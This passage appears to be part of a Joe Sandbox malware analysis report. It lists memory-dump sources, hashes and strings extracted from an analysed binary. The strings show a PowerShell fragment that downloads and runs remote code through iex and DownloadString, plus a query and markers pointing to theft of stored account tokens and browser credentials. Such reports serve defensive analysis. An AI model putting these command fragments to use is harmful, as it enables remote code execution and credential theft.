                    • Associated: 00000000.00000002.2933734578.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933784986.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933805051.000000000041F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933828232.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933975503.000000000065C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                    • API String ID: 0-1079375795
                    • Opcode ID: 2304b525dfd5cb075d6fee0e8a0e6a0fb786bc460e7b5f7a938625e5c8a7e397
                    • Instruction ID: 1db97c5984eaf975dbf010622291b68d8c4d82df198c84c91f10bdfb5a5a1c79
                    • Opcode Fuzzy Hash: 2304b525dfd5cb075d6fee0e8a0e6a0fb786bc460e7b5f7a938625e5c8a7e397
                    • Instruction Fuzzy Hash: 8CB19671911108ABDB04FBA1DD52EEE7339AF14314F40452EF506B2091EF386E99CBBA
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2933755109.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2933734578.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933784986.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933805051.000000000041F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933828232.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933975503.000000000065C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: h@eA$h`eA$jF$0D
                    • API String ID: 0-2392216807
                    • Opcode ID: ab46bafc544b26492acc5b1cf6fcd3781d0311f9c280608e65492746e3f96c47
                    • Instruction ID: 408c48dfe12b650411fad4146a5604383a02d9c5279adaaf68bea769d40d9859
                    • Opcode Fuzzy Hash: ab46bafc544b26492acc5b1cf6fcd3781d0311f9c280608e65492746e3f96c47
                    • Instruction Fuzzy Hash: BF81B975E00204A6DB24F765DC47BED73786B85308F4485AEB449661C1EE3C9B8CCB9B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2933755109.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2933734578.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933784986.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933805051.000000000041F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933828232.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933975503.000000000065C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                    • API String ID: 0-1096346117
                    • Opcode ID: cf3bd8b6a91d7380b4fcfdc4a2eaf8d3038d72e2fe7c69aa23c32b41aba9b41f
                    • Instruction ID: cfc602575c7eb8b90e75612a825b183f0a0020e5ceb1952e76b28d7f8d83ce04
                    • Opcode Fuzzy Hash: cf3bd8b6a91d7380b4fcfdc4a2eaf8d3038d72e2fe7c69aa23c32b41aba9b41f
                    • Instruction Fuzzy Hash: C9615F30A00248EBCB24EFA5DD96FED7775AF44304F408029F90A6F1D1DB786A56CB5A
                    Strings
                    • ')", xrefs: 00412CB3
                    • <, xrefs: 00412D39
                    • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412CC4
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412D04
                    Memory Dump Source
                    • Source File: 00000000.00000002.2933755109.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2933734578.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933784986.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933805051.000000000041F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933828232.000000000042B000.00000008.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2933975503.000000000065C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    • API String ID: 0-898575020
                    • Opcode ID: 7f128ac8f9bb9458abef97919d6b2e581af989fbd2c846308f4a6e5cacd24915
                    • Instruction ID: 8aa8f54ed0a99c91faffa02525c95fa844b6858a6ee3c68abfdd9097d7126834
                    • Opcode Fuzzy Hash: 7f128ac8f9bb9458abef97919d6b2e581af989fbd2c846308f4a6e5cacd24915
                    • Instruction Fuzzy Hash: 08410E71D112089ADB14FBA1C991FDDB774AF10314F50401EE016A7192DF786ADBCFA9